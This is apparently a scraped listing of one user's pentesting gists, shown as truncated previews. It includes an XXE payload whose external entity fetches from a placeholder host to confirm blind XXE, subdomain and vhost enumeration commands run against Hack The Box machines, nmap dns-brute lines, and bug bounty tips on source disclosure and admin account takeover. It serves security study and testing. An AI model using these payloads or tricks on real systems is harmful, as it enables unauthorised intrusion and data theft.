0xSojalSec
/ dicc.txt
Created
July 26, 2022 18:31
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| ..;/ | |
| @ | |
| [ | |
| \ | |
| \…..\\\…..\\\…..\\\ | |
| ] | |
| _ | |
| __ | |
| ` | |
| ~/ |
0xSojalSec
/ XXE_payloads
Created
July 26, 2022 16:15
— forked from mgeeky/XXE_payloads
XXE Payloads
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| -------------------------------------------------------------- | |
| Vanilla, used to verify outbound xxe or blind xxe | |
| -------------------------------------------------------------- | |
| <?xml version="1.0" ?> | |
| <!DOCTYPE r [ | |
| <!ELEMENT r ANY > | |
| <!ENTITY sp SYSTEM "http://x.x.x.x:443/test.txt"> | |
| ]> | |
| <r>&sp;</r> |
0xSojalSec
/ Ultimate-Cheatsheet.md
Created
July 24, 2022 18:11
— forked from bgoonz/Ultimate-Cheatsheet.md
Ultimate-Cheatsheet
0xSojalSec
/ readme.MD
Created
July 24, 2022 18:11
— forked from nordineb/readme.MD
Subdomain Enumeraton Tools,Wordlists and Online DNS tools.
https://github.com/aboul3la/Sublist3r https://github.com/jhaddix/domain https://github.com/guelfoweb/knock https://github.com/TheRook/subbrute https://github.com/blechschmidt/massdns https://bitbucket.org/LaNMaSteR53/recon-ng https://github.com/caffix/amass https://github.com/cakinney/domained https://github.com/rbsec/dnscan
0xSojalSec
/ vhost.sh
Created
July 24, 2022 18:11
— forked from oxtd/vhost.sh
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| $ ffuf -c -u http://bolt.htb/ -w /usr/share/seclists/Discovery/DNS/subdomains-top1million-5000.txt -H "Host: FUZZ.bolt.htb" -fl 505 | |
| /'___\ /'___\ /''___\ | |
| /\ \__/ /\ \__/ __ __ /\ \__/ | |
| \ \ ,__\\ \ ,__\/\ \/\ \ \ \ ,__\ | |
| \ \ \_/ \ \ \_/\ \ \_\ \ \ \ \_/ | |
| \ \_\ \ \_\ \ \____/ \ \_\ | |
| \/_/ \/_/ \/___/ \/_/ | |
| v1.3.1 Kali Exclusive <3 |
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| gobuster vhost -u http://horizontall.htb/ -w /usr/share/seclists/Discovery/DNS/subdomains-top1million-110000.txt -t 200 | |
| =============================================================== | |
| Gobuster v3.1.0 | |
| by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart) | |
| =============================================================== | |
| [+] Url: http://horizontall.htb/ | |
| [+] Method: GET | |
| [+] Threads: 200 | |
| [+] Wordlist: /usr/share/seclists/Discovery/DNS/subdomains-top1million-110000.txt | |
| [+] User Agent: gobuster/3.1.0 |
0xSojalSec
/ Exploitation.md
Created
July 24, 2022 18:10
— forked from yezz123/Exploitation.md
Pentesting-Exploitation
Pentesting-Exploitation Programs and Commands , Protocols Network / Ports
0xSojalSec
/ Bug_Bounty_tips
Created
July 24, 2022 18:10
— forked from BugHunter001/Bug_Bounty_tips
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| site.com/file.php | |
| response = nothing | |
| http://site.com/file.php~ | |
| response = source | |
| ------------------------------------- | |
| https://github.com/kleiton0x00/CRLF-one-liner | |
| ------------------------------------------ | |
| try to add admin as your user, | |
| change his email to yours, |
0xSojalSec
/ nmap.txt
Created
July 24, 2022 18:10
— forked from ehsahil/nmap.txt
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| #Finding subdomains via Nmap. | |
| nmap --script dns-brute --script-args dns-brute.domain=domain.com,dns-brute.threads=6,dns-brute.hostlist=./sub1000.lst | |
| nmap --script dns-brute --script-args dns-brute.domain=domain.com,dns-brute.threads=6,dns-brute.hostlist=./sub10000.lst | |
| nmap --script dns-brute --script-args dns-brute.domain=domain.com,dns-brute.threads=6,dns-brute.hostlist=./sub100000.lst | |
| nmap --script dns-brute --script-args dns-brute.domain=domain.com,dns-brute.threads=6,dns-brute.hostlist=./sub1000000.lst |
0xSojalSec
/ linkfinder-oneliner.sh
Created
July 24, 2022 18:09
— forked from ntrzz/linkfinder-oneliner.sh
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| curl -s $1 | grep -Eo "(http|https)://[a-zA-Z0-9./?=_-]*" | sort | uniq | grep ".js" > jslinks.txt; while IFS= read link; do python linkfinder.py -i "$link" -o cli; done < jslinks.txt | grep $2 | grep -v $3 | sort -n | uniq; rm -rf jslinks.txt |